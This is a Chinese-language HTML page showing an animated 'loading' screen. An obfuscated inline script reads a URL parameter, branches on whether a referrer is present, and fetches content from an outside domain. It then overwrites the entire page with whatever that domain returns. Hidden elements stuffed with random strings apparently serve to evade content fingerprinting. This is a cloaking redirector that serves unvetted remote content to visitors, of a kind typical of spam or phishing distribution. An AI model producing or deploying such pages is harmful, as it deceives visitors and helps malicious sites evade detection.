<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .j0fPnoaUulS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .j0fPnoaUulS .upQFCHJHy {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .j0fPnoaUulS .content {
            line-height: 50px;
            text-align: center
        }

        .j0fPnoaUulS .img {
            width: 100%
        }

        .j0fPnoaUulS .GUKdZtLajb {
            text-align: center
        }

        .j0fPnoaUulS .GUKdZtLajb span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .j0fPnoaUulS .GUKdZtLajb span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .j0fPnoaUulS .GUKdZtLajb span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .j0fPnoaUulS .GUKdZtLajb span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .j0fPnoaUulS .GUKdZtLajb span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .j0fPnoaUulS .GUKdZtLajb span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .j0fPnoaUulS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MHJ4DsF7tO(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var OUoqO9 = MHJ4DsF7tO('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ OUoqO9 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ OUoqO9 +".html?a=share";
		}
		
        HB8rtO=url+"#"+new Date().getTime();
        HB8rtO && function() {
            $.get(HB8rtO, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>sj7pIuwIa6n39</p>
<img  src='' style='display:none'>
<li style='display:none' >VEKAT6lq7cMvTjaylPd6EvI2U29tvsaakhlkaPIu1r1paDwhrk4mBC7vLJszDCnau5HRknolvqKF1Yz9dQ3n0mE9wEuTMsBEo</li>
<b style='display:none' >Un0Q5KZv9o0RLvH16hCQeGC7wONDyqHQnRixde9JDzjSwU2axuInJ3rv2xg2YtutycvqSq1g7c</b>
<ul style='display:none' >QsAHqUkkzCyzi8T6U9vvHiQwwNJYugWjSA3TF6R68qJhvibdtDOAYUC4jezfRWMtZ0zanCdIgeyeWnosob3Q9z</ul>
<span style='display:none'>gHL2fzJoBYZJnPXWLBNf32i8jSuGF2xNrP6L4QvGbuvY9E1g40Il2Ahb0Kwf4K1dwTRDZLx3l</span><div class="j0fPnoaUulS">
    <div class="upQFCHJHy">
        <div class="GUKdZtLajb">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>dYqZ1GRU7GTH</p>
<ul style='display:none' >XeRKoFSZpU6KjOah8yDhxk</ul>
<b style='display:none' >TZFU7Om8AXF0sEW</b>
<img  src='' style='display:none'>
<span style='display:none'>YpEOW2fFW3s789usdhI1tTAQxaABeeVz2RCfXy2eeC0h9jrF93O7NBpd5Uq4RX64GrkS3oJlg2fvFwjM4jJ</span>
<li style='display:none' >lnRO9eooX33RbbK0lM4SLvEigr6ABeFMwamxQfja7qV3gxMQIsPuwTtGRXvtpUDz5b2SFmu6R4qjD8</li></body>
</html>